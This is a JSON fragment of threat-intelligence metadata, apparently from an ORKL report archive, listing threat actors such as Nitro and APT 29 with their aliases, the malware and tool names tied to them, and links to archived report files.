	"threat_actors": [
		{
			"id": "9041c438-4bc0-4863-b89c-a32bba33903c",
			"created_at": "2023-01-06T13:46:38.232751Z",
			"updated_at": "2026-04-10T02:00:02.888195Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove"
			],
			"source_name": "MISPGALAXY:Nitro",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b44a04-a080-4465-973d-976ce53777de",
			"created_at": "2022-10-25T16:07:23.911791Z",
			"updated_at": "2026-04-10T02:00:04.786538Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove",
				"Nitro"
			],
			"source_name": "ETDA:Nitro",
			"tools": [
				"AngryRebel",
				"Backdoor.Apocalipto",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCClient",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Spindest",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e8dd54ac-a3fa-4496-8b17-a9360ad13927",
			"created_at": "2024-07-28T02:00:04.686094Z",
			"updated_at": "2026-04-10T02:00:03.680897Z",
			"deleted_at": null,
			"main_name": "Stargazer Goblin",
			"aliases": [],
			"source_name": "MISPGALAXY:Stargazer Goblin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "821d8858-a784-4ab2-9ecb-56c7afeed7d7",
			"created_at": "2023-11-21T02:00:07.403629Z",
			"updated_at": "2026-04-10T02:00:03.479942Z",
			"deleted_at": null,
			"main_name": "SilverFish",
			"aliases": [],
			"source_name": "MISPGALAXY:SilverFish",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434413,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9360ea522e191d1c65670d2245d2d928b6b2c123.pdf",
		"text": "https://archive.orkl.eu/9360ea522e191d1c65670d2245d2d928b6b2c123.txt",
		"img": "https://archive.orkl.eu/9360ea522e191d1c65670d2245d2d928b6b2c123.jpg"
	}
}